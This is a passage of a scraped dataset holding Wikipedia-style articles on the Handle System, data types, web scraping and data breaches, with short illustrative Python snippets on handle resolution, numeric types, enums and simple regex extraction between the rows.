Libraries. 14 Handle clients can be embedded in end user software (e.g., a web browser) or in server software (e.g., a web server) and extensions are already available for Adobe Acrobat 15 and Firefox. 16 Handle client software libraries are available in both C and Java. Some applications have developed specific add-on tools, e.g., for the DOI System. 17 The interoperable network of distributed handle resolver servers (also known as the Proxy Server System) is linked through a Global Resolver (which is one logical entity though physically decentralised and mirrored). Users of Handle System technology obtain a handle prefix created in the Global Handle Registry. The Global Handle Registry maintains and resolves the prefixes of locally maintained handle services. Any local handle service can, therefore, resolve any handle through the Global Resolver. Handles (identifiers) are passed by a client, as a query of the naming authority prefix, to the Handle System's Global Handle Registry (GHR). The GHR responds by sending the client the location information for the relevant Local Handle Service (which may consist of multiple servers in multiple sites); a query is then sent to the relevant server within the Local Handle Service. The Local Handle Service returns the information needed to acquire the resource, e.g., a URL which can then be turned into an HTTP redirect. (Note: if the client already has information on the appropriate LHS to query, the initial query to the GHR is omitted.) Though the original model from which the Handle System derives dealt with management of digital objects, the Handle System does not mandate any particular model of relationships between the identified entities, nor is it limited to identifying only digital objects: non-digital entities may be represented as a corresponding digital object for the purposes of digital object management. 
Some care is needed in the definition of such objects and how they relate to non-digital entities; there are established models that can aid in such definitions e.g., Functional Requirements for Bibliographic Records (FRBR), CIDOC CRM, and indecs content model. Some applications have found it helpful to marry such a framework to the handle application: for example, the Advanced Distributed Learning (ADL) Initiative 18 brings together Handle System application with existing standards for distributed learning content, using a Shareable Content Object Reference Model (SCORM), 19 and the Digital Object Identifier (DOI) system implementation of the Handle System has adopted it together with the indecs framework to deal with semantic interoperability. The Handle System also makes explicit the importance of organizational commitment to a persistent identifier scheme, but does not mandate one model for ensuring such commitment. Individual applications may choose to establish their own sets of rules and social infrastructure to ensure persistence (e.g., when used in the DSpace application, and the DOI application). 20 The Handle system is designed to meet the following requirements to contribute to persistence 21 The identifier string: The identifier resolution mechanism: Among the objects that are currently identified by handles are journal articles, technical reports, books, theses and dissertations, government documents, metadata, distributed learning content, and data sets. Handles are being used in digital watermarking applications, GRID applications, repositories, and more. Although individual users may download and use the HANDLE.NET software independently, many users have found it beneficial to collaborate in developing applications in a federation, using common policy or additional technology to provide shared services. As one of the first persistent identifier schemes, the Handle System has been widely adopted by public and private institutions and proven over several years. (See Paradigm, Persistent identifiers.) 22 Handle System applications may use handles as simple persistent identifiers (as most commonly used, to resolve to the current URL of an object), or may choose to take advantage of other features. Its support for the simultaneous return as output of multiple pieces of current information related to the object, in defined data structures, enables priorities to be established for the order in which the multiple resolutions will be used. Handles can, therefore, resolve to different digital versions of the same content, to mirror sites, or to different business models (pay vs. free, secure vs. open, public vs. private). They can also resolve to different digital versions of differing content, such as a mix of objects required for a distance-learning course. There are thousands of handle services running today, located in 71 countries, on 6 continents; over 1000 of them run at universities and libraries. Handle services are being run by user federations, national laboratories, universities, computing centers, libraries (national and local), government agencies, contractors, corporations, and research groups. Major publishers use the Handle System for persistent identification of commercially traded and Open Access content through its implementation with the Digital Object Identifier (DOI) system. The number of prefixes, which allow users to assign handles, is growing and stands at over 12,000 as of early 2014. 
There are six top-level Global Handle Registry servers that receive (on average) 68 million resolution requests per month. Proxy servers known to CNRI, passing requests to the system on the Web, receive (on average) 200 million resolution requests per month. (Statistics from Handle Quick Facts.) In 2010, CNRI and ITU (International Telecommunication Union) entered into an agreement to collaborate on use of the Handle System (and the Digital Object Architecture more generally) and are working on the specific details of that collaboration; in April 2009 ITU listed the Handle System as an "emerging trend". 23 Handle System, HANDLE.NET and Global Handle Registry are trademarks of the Corporation for National Research Initiatives (CNRI), a non-profit research and development corporation in the US. The Handle System is the subject of patents by CNRI, which licenses its Handle System technology through a public license, 24 similar to an open source license, in order to enable broader use of the technology. Handle System infrastructure is supported by prefix registration and service fees, with the majority coming from single prefix holders. The largest current single contributor is the International DOI Foundation. The Public License allows commercial and non-commercial use at low cost of both its patented technology and the reference implementation of the software, and allows the software to be freely embedded in other systems and products. A Service Agreement 5 is also available for users who intend to provide identifier and or resolution services using the Handle System technology under the Handle System public license. The Handle System represents several components of a long-term digital object architecture. In January 2010 CNRI released its general-purpose Digital Object Repository software, 25 another major component of this architecture. More information 26 about the release, including protocol specification, source code and ready-to-use system, clients and utilities, is available. 27 28 |
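The prefix-then-local-service resolution flow described in this entry can be exercised end to end through the generic HTTP proxy. Below is a minimal sketch, assuming the public proxy at https://hdl.handle.net is reachable from this notebook and that the handle 20.1000/100 (the HANDLE.NET license handle mentioned above) still resolves; resolve_handle is a helper name introduced here only for illustration.

import requests

def resolve_handle(handle, proxy="https://hdl.handle.net"):
    """Resolve a handle via the generic HTTP proxy and return the URL it is bound to."""
    # The proxy answers GET <proxy>/<handle> with an HTTP redirect whose
    # Location header carries the URL currently bound to the handle.
    response = requests.get(f"{proxy}/{handle}", allow_redirects=False, timeout=10)
    if response.is_redirect or response.is_permanent_redirect:
        return response.headers.get("Location")
    response.raise_for_status()
    return None

# Example (requires network access): the HANDLE.NET license handle discussed above.
print(resolve_handle("20.1000/100"))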
110 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_type | In computer science and computer programming, a data type (or simply type) is a collection or grouping of data values, usually specified by a set of possible values, a set of allowed operations on these values, and/or a representation of these values as machine types. 1 A data type specification in a program constrains the possible values that an expression, such as a variable or a function call, might take. On literal data, it tells the compiler or interpreter how the programmer intends to use the data. Most programming languages support basic data types of integer numbers (of varying sizes), floating-point numbers (which approximate real numbers), characters and Booleans. 2 3 A data type may be specified for many reasons: similarity, convenience, or to focus attention. It is frequently a matter of good organization that aids the understanding of complex definitions. Almost all programming languages explicitly include the notion of data type, though the possible data types are often restricted by considerations of simplicity, computability, or regularity. An explicit data type declaration typically allows the compiler to choose an efficient machine representation, but the conceptual organization offered by data types should not be discounted. 4 Different languages may use different data types or similar types with different semantics. For example, in the Python programming language, int represents an arbitrary-precision integer which has the traditional numeric operations such as addition, subtraction, and multiplication. However, in the Java programming language, the type int represents the set of 32-bit integers ranging in value from -2,147,483,648 to 2,147,483,647, with arithmetic operations that wrap on overflow. In Rust this 32-bit integer type is denoted i32 and panics on overflow in debug mode. 5 Most programming languages also allow the programmer to define additional data types, usually by combining multiple elements of other types and defining the valid operations of the new data type. For example, a programmer might create a new data type named "complex number" that would include real and imaginary parts, or a color data type represented by three bytes denoting the amounts of each of red, green, and blue, and a string representing the color's name. Data types are used within type systems, which offer various ways of defining, implementing, and using them. In a type system, a data type represents a constraint placed upon the interpretation of data, describing representation, interpretation and structure of values or objects stored in computer memory. The type system uses data type information to check correctness of computer programs that access or manipulate the data. A compiler may use the static type of a value to optimize the storage it needs and the choice of algorithms for operations on the value. In many C compilers the float data type, for example, is represented in 32 bits, in accord with the IEEE specification for single-precision floating point numbers. They will thus use floating-point-specific microprocessor operations on those values (floating-point addition, multiplication, etc.). 
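The contrast drawn above between Python's arbitrary-precision int and Java's wrapping 32-bit int can be shown in a few lines of Python; wrap_int32 is a hypothetical helper used only to simulate two's-complement wraparound.

# Python ints are arbitrary-precision, so they never wrap on overflow.
big = 2_147_483_647 + 1                      # one past Java's Integer.MAX_VALUE
print(big)                                   # 2147483648

def wrap_int32(n):
    """Simulate Java-style 32-bit two's-complement wraparound."""
    n &= 0xFFFFFFFF                          # keep only the low 32 bits
    return n - 0x1_0000_0000 if n >= 0x8000_0000 else n

print(wrap_int32(2_147_483_647 + 1))         # -2147483648, as a Java int would produce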
Most data types in statistics have comparable types in computer programming, and vice versa, as shown in the following table: Parnas, Shore and Weiss (1976) identified five definitions of a "type" that were used—sometimes implicitly—in the literature: The definition in terms of a representation was often done in imperative languages such as ALGOL and Pascal, while the definition in terms of a value space and behaviour was used in higher-level languages such as Simula and CLU. Types including behavior align more closely with object-oriented models, whereas a structured programming model would tend not to include code; such types are called plain old data structures. Data types may be categorized according to several factors: The terminology varies: in the literature, primitive, built-in, basic, atomic, and fundamental may be used interchangeably. 8 All data in computers based on digital electronics is represented as bits (alternatives 0 and 1) on the lowest level. The smallest addressable unit of data is usually a group of bits called a byte (usually an octet, which is 8 bits). The unit processed by machine code instructions is called a word (as of 2011, typically 32 or 64 bits). Machine data types expose or make available fine-grained control over hardware, but this can also expose implementation details that make code less portable. Hence machine types are mainly used in systems programming or low-level programming languages. In higher-level languages most data types are abstracted in that they do not have a language-defined machine representation. The C programming language, for instance, supplies types such as Booleans, integers, floating-point numbers, etc., but the precise bit representations of these types are implementation-defined. The only C type with a precise machine representation is the char type that represents a byte. 9 The Boolean type represents the values true and false. Although only two values are possible, they are more often represented as a word rather than as a single bit, as it requires more machine instructions to store and retrieve an individual bit. Many programming languages do not have an explicit Boolean type, instead using an integer type and interpreting (for instance) 0 as false and other values as true. In such representations, a 0 is read as the logical value false, and any non-zero value, conventionally 1, as true. Almost all programming languages supply one or more integer data types. They may either supply a small number of predefined subtypes restricted to certain ranges (such as short and long and their corresponding unsigned variants in C/C++); or allow users to freely define subranges such as 1..12 (e.g. Pascal/Ada). If a corresponding native type does not exist on the target platform, the compiler will break them down into code using types that do exist. For instance, if a 32-bit integer is requested on a 16-bit platform, the compiler will tacitly treat it as an array of two 16-bit integers. Floating point data types represent certain fractional values (rational numbers, mathematically). Although they have predefined limits on both their maximum values and their precision, they are sometimes misleadingly called reals (evocative of mathematical real numbers). They are typically stored internally in the form a × 2^b (where a and b are integers), but displayed in familiar decimal form. 
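The a × 2^b representation mentioned in the last sentence can be inspected from Python's standard library. A small sketch, assuming the usual IEEE 754 double format:

import math

x = 6.5
a, denominator = x.as_integer_ratio()        # x == a / denominator, denominator a power of two
b = -int(math.log2(denominator))             # so x == a * 2**b with integer a and b
print(a, b, a * 2**b == x)                   # 13 -1 True

# Decimal 0.1 has no exact a * 2**b form, so the stored double only approximates it.
print((0.1).as_integer_ratio())              # a large odd numerator over 2**55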
Fixed point data types are convenient for representing monetary values. They are often implemented internally as integers, leading to predefined limits. For independence from architecture details, a Bignum or arbitrary precision numeric type might be supplied. This represents an integer or rational to a precision limited only by the available memory and computational resources on the system. Bignum implementations of arithmetic operations on machine-sized values are significantly slower than the corresponding machine operations. 10 The enumerated type has distinct values, which can be compared and assigned, but which do not necessarily have any particular concrete representation in the computer's memory; compilers and interpreters can represent them arbitrarily. For example, the four suits in a deck of playing cards may be four enumerators named CLUB, DIAMOND, HEART, SPADE, belonging to an enumerated type named suit. If a variable V is declared having suit as its data type, one can assign any of those four values to it. Some implementations allow programmers to assign integer values to the enumeration values, or even treat them as type-equivalent to integers. Strings are a sequence of characters used to store words or plain text, and often text in markup languages representing formatted text. Characters may be a letter of some alphabet, a digit, a blank space, a punctuation mark, etc. Characters are drawn from a character set such as ASCII. Character and string types can have different subtypes according to the character encoding. The original 7-bit wide ASCII was found to be limited, and superseded by 8-, 16- and 32-bit sets, which can encode a wide variety of non-Latin alphabets (such as Hebrew and Chinese) and other symbols. Strings may be of either variable length or fixed length, and some programming languages have both types. They may also be subtyped by their maximum size. Since most character sets include the digits, it is possible to have a numeric string, such as "1234". These numeric strings are usually considered distinct from numeric values such as 1234, although some languages automatically convert between them. A union type definition will specify which of a number of permitted subtypes may be stored in its instances, e.g. "float or long integer". In contrast with a record, which could be defined to contain a float and an integer, a union may only contain one subtype at a time. A tagged union (also called a variant, variant record, discriminated union, or disjoint union) contains an additional field indicating its current type for enhanced type safety. An algebraic data type (ADT) is a possibly recursive sum type of product types. A value of an ADT consists of a constructor tag together with zero or more field values, with the number and type of the field values fixed by the constructor. The set of all possible values of an ADT is the set-theoretic disjoint union (sum) of the sets of all possible values of its variants (product of fields). Values of algebraic types are analyzed with pattern matching, which identifies a value's constructor and extracts the fields it contains. If there is only one constructor, then the ADT corresponds to a product type similar to a tuple or record. A constructor with no fields corresponds to the empty product (unit type). If all constructors have no fields then the ADT corresponds to an enumerated type. One common ADT is the option type, defined in Haskell as data Maybe a = Nothing | Just a. 
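The enumerated type, tagged union, and option type described above can all be approximated in Python. A rough sketch (Suit, Nothing, and Just are names invented for this illustration, not part of any library):

from dataclasses import dataclass
from enum import Enum
from typing import Union

class Suit(Enum):
    # An enumerated type: four named values with no fixed machine representation.
    CLUB = "club"
    DIAMOND = "diamond"
    HEART = "heart"
    SPADE = "spade"

@dataclass
class Nothing:
    pass

@dataclass
class Just:
    value: int

# A tagged union: the concrete class acts as the tag, each variant carries its own fields.
Maybe = Union[Nothing, Just]                 # rough analogue of data Maybe a = Nothing | Just a

def describe(m: Maybe) -> str:
    # "Pattern matching" by inspecting the tag (the concrete class).
    return f"Just {m.value}" if isinstance(m, Just) else "Nothing"

print(Suit.HEART, describe(Just(42)), describe(Nothing()))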
11 Some types are very useful for storing and retrieving data and are called data structures. Common data structures include: An abstract data type is a data type that does not specify the concrete representation of the data. Instead, a formal specification based on the data type's operations is used to describe it. Any implementation of a specification must fulfill the rules given. For example, a stack has push/pop operations that follow a Last-In-First-Out rule, and can be concretely implemented using either a list or an array. Abstract data types are used in formal semantics and program verification and, less strictly, in design. The main non-composite, derived type is the pointer, a data type whose value refers directly to (or "points to") another value stored elsewhere in the computer memory using its address. It is a primitive kind of reference. (In everyday terms, a page number in a book could be considered a piece of data that refers to another one.) Pointers are often stored in a format similar to an integer; however, attempting to dereference or "look up" a pointer whose value was never a valid memory address would cause a program to crash. To ameliorate this potential problem, pointers are considered a separate type from the type of data they point to, even if the underlying representation is the same. Functional programming languages treat functions as a distinct datatype and allow values of this type to be stored in variables and passed to functions. Some multi-paradigm languages such as JavaScript also have mechanisms for treating functions as data. 13 Most contemporary type systems go beyond JavaScript's simple type "function object" and have a family of function types differentiated by argument and return types, such as the type Int -> Bool denoting functions taking an integer and returning a Boolean. In C, a function is not a first-class data type but function pointers can be manipulated by the program. Java and C++ originally did not have function values but have added them in C++11 and Java 8. A type constructor builds new types from old ones, and can be thought of as an operator taking zero or more types as arguments and producing a type. Product types, function types, power types and list types can be made into type constructors. Universally-quantified and existentially-quantified types are based on predicate logic. Universal quantification is written as ∀x.f(x) or forall x. f x and is the intersection over all types x of the body f x, i.e. the value is of type f x for every x. Existential quantification is written as ∃x.f(x) or exists x. f x and is the union over all types x of the body f x, i.e. the value is of type f x for some x. In Haskell, universal quantification is commonly used, but existential types must be encoded by transforming exists a. f a into forall r. (forall a. f a -> r) -> r or a similar type. A refinement type is a type endowed with a predicate which is assumed to hold for any element of the refined type. For instance, the type of natural numbers greater than 5 may be written as {n ∈ ℕ | n > 5}. A dependent type is a type whose definition depends on a value. Two common examples of dependent types are dependent functions and dependent pairs. The return type of a dependent function may depend on the value (not just type) of one of its arguments. A dependent pair may have a second value of which the type depends on the first value. 
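Earlier in this passage a stack is given as the canonical abstract data type: push/pop operations obeying a Last-In-First-Out rule, independent of the concrete representation. A minimal sketch, here backed by a Python list:

class Stack:
    """Abstract interface: push, pop, peek. The backing list stays an implementation detail."""

    def __init__(self):
        self._items = []

    def push(self, item):
        self._items.append(item)

    def pop(self):
        if not self._items:
            raise IndexError("pop from empty stack")
        return self._items.pop()

    def peek(self):
        return self._items[-1] if self._items else None

s = Stack()
s.push(1)
s.push(2)
print(s.pop(), s.pop())                      # 2 1 -- Last-In-First-Out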
An intersection type is a type containing those values that are members of two specified types. For example, in Java the class Boolean implements both the Serializable and the Comparable interfaces. Therefore, an object of type Boolean is a member of the type Serializable ∩ Comparable. Considering types as sets of values, the intersection type σ ∩ τ is the set-theoretic intersection of σ and τ. It is also possible to define a dependent intersection type, denoted (x : σ) ∩ τ, where the type τ may depend on the term variable x. 14 Some programming languages represent the type information as data, enabling type introspection and reflection. In contrast, higher order type systems, while allowing types to be constructed from other types and passed to functions as values, typically avoid basing computational decisions on them. [citation needed] For convenience, high-level languages and databases may supply ready-made "real world" data types, for instance times, dates, and monetary values (currency). 15 16 These may be built into the language or implemented as composite types in a library. 17 |
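The type introspection and reflection mentioned in this entry (representing type information as data) is directly visible in Python, where types are ordinary objects:

value = 3.14

t = type(value)                              # the type itself is a first-class object
print(t.__name__)                            # 'float'
print(isinstance(value, (int, float)))       # True

# Reflection: enumerate the operations a type offers, then look one up by name.
print([name for name in dir(t) if name.startswith("is_")])   # ['is_integer']
print(getattr(value, "is_integer")())                        # False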
111 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-19 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
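The grep/regular-expression approach described at the start of this passage can be sketched with Python's re module. The URL below is only a placeholder and the e-mail pattern is deliberately naive, so treat this as an illustration rather than a robust extractor:

import re
import requests

url = "https://example.com"                  # placeholder target page
html = requests.get(url, timeout=10).text

# Grep-style extraction: pull out anything that looks roughly like an e-mail address.
email_pattern = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
emails = sorted(set(email_pattern.findall(html)))
print(emails)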
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the other links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. [citation needed] In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
112 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_breach | A data breach, also known as data leakage, is "the unauthorized exposure, disclosure, or loss of personal information". 1 Attackers have a variety of motives, from financial gain to political activism, political repression, and espionage. There are several technical root causes of data breaches, including accidental or intentional disclosure of information by insiders, loss or theft of unencrypted devices, hacking into a system by exploiting software vulnerabilities, and social engineering attacks such as phishing where insiders are tricked into disclosing information. Although prevention efforts by the company holding the data can reduce the risk of data breach, it cannot bring it to zero. The first reported breach was in 2002 and the number occurring each year has grown since then. A large number of data breaches are never detected. If a breach is made known to the company holding the data, post-breach efforts commonly include containing the breach, investigating its scope and cause, and notifications to people whose records were compromised, as required by law in many jurisdictions. Law enforcement agencies may investigate breaches, although the hackers responsible are rarely caught. Many criminals sell data obtained in breaches on the dark web. Thus, people whose personal data was compromised are at elevated risk of identity theft for years afterwards and a significant number will become victims of this crime. Data breach notification laws in many jurisdictions, including all states of the United States and European Union member states, require the notification of people whose data has been breached. Lawsuits against the company that was breached are common, although few victims receive money from them. There is little empirical evidence of economic harm to firms from breaches except the direct cost, although there is some evidence suggesting a temporary, short-term decline in stock price. A data breach is a violation of "organizational, regulatory, legislative or contractual" law or policy 2 that causes "the unauthorized exposure, disclosure, or loss of personal information". 1 Legal and contractual definitions vary. 3 2 Some researchers include other types of information, for example intellectual property or classified information. 4 However, companies mostly disclose breaches because it is required by law, 5 and only personal information is covered by data breach notification laws. 6 7 The first reported data breach occurred on 5 April 2002 8 when 250,000 social security numbers collected by the State of California were stolen from a data center. 9 Before the widespread adoption of data breach notification laws around 2005, the prevalence of data breaches is difficult to determine. Even afterwards, statistics per year cannot be relied on because data breaches may be reported years after they occurred, 10 or not reported at all. 11 Nevertheless, the statistics show a continued increase in the number and severity of data breaches that continues as of 2022 update . 12 In 2016, researcher Sasha Romanosky estimated that data breaches (excluding phishing) outnumbered other security breaches by a factor of four. 13 According to a 2020 estimate, 55 percent of data breaches were caused by 